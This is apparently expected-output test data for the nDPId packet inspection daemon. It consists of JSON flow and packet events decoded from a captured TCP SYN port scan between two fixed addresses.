+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsuHAAADUGWwKsEAAIQA2GNIzTwA3dU4MZAAAAAGACCABwfgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsABEAADIGFmKsEAAIQA2GNIzTAW7dU4MZAAAAAGACDAArHgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAs+lUAADMGGx2sEAAIQA2GNIzTBHzdU4MZAAAAAGACEAAkEAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsym4AAC8GTwSsEAAIQA2GNIzTBnrdU4MZAAAAAGACEAAiEgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wAAAC8GRnKsEAAIQA2GNIzTAH3dU4MZAAAAAGACEAAoDwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsU2gAADoGuwqsEAAIQA2GNIzTPoDdU4MZAAAAAGACDADuCwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAspR0AACYGfVWsEAAIQA2GNIzTBrbdU4MZAAAAAGACDAAl1gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsaGIAADEGrxCsEAAIQA2GNIzTKhrdU4MZAAAAAGACCAAGcgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsf0wAADAGmSasEAAIQA2GNIzTBrndU4MZAAAAAGACBAAt0wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs3P8AAC4GPXOsEAAIQA2GNIzTBK\/dU4MZAAAAAGACDAAn3QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAstBMAACsGaV+sEAAIQA2GNIzTB1PdU4MZAAAAAGACEAAhOQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsMAEAADUG43GsEAAIQA2GNIzTDT7dU4MZAAAAAGACCAAjTgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsRyIAAC0G1FCsEAAIQA2GNIzTIf3dU4MZAAAAAGACCAAOjwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsWeIAACUGyZCsEAAIQA2GNIzTBDvdU4MZAAAAAGACCAAsUQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAso64AADAGdMSsEAAIQA2GNIzSgAvdUoMYAAAAAGACBAC0gwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAss6AAADcGXdKsEAAIQA2GNIzSwATdUoMYAAAAAGACEABoigAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsJmIAACkG+RCsEAAIQA2GNIzSFYbdUoMYAAAAAGACCAAbCQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsVkIAACsGxzCsEAAIQA2GNIzSFb7dUoMYAAAAAGACEAAS0QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsE28AADgG\/QOsEAAIQA2GNIzSJw\/dUoMYAAAAAGACBAANgAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs68EAAC8GLbGsEAAIQA2GNIzSJQ3dUoMYAAAAAGACEAADggAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsD9gAADIGBpusEAAIQA2GNIzSDybdUoMYAAAAAGACDAAdaQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs9s8AADsGFqOsEAAIQA2GNIzSAFTdUoMYAAAAAGACEAAoOwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsPmoAADEG2QisEAAIQA2GNIzSDtndUoMYAAAAAGACCAAhtgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsHzcAADAG+TusEAAIQA2GNIzSRkTdUoMYAAAAAGACBADuSgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsh2UAACoGlw2sEAAIQA2GNIzSwALdUoMYAAAAAGACDABsjAAAAgQFtA=="} 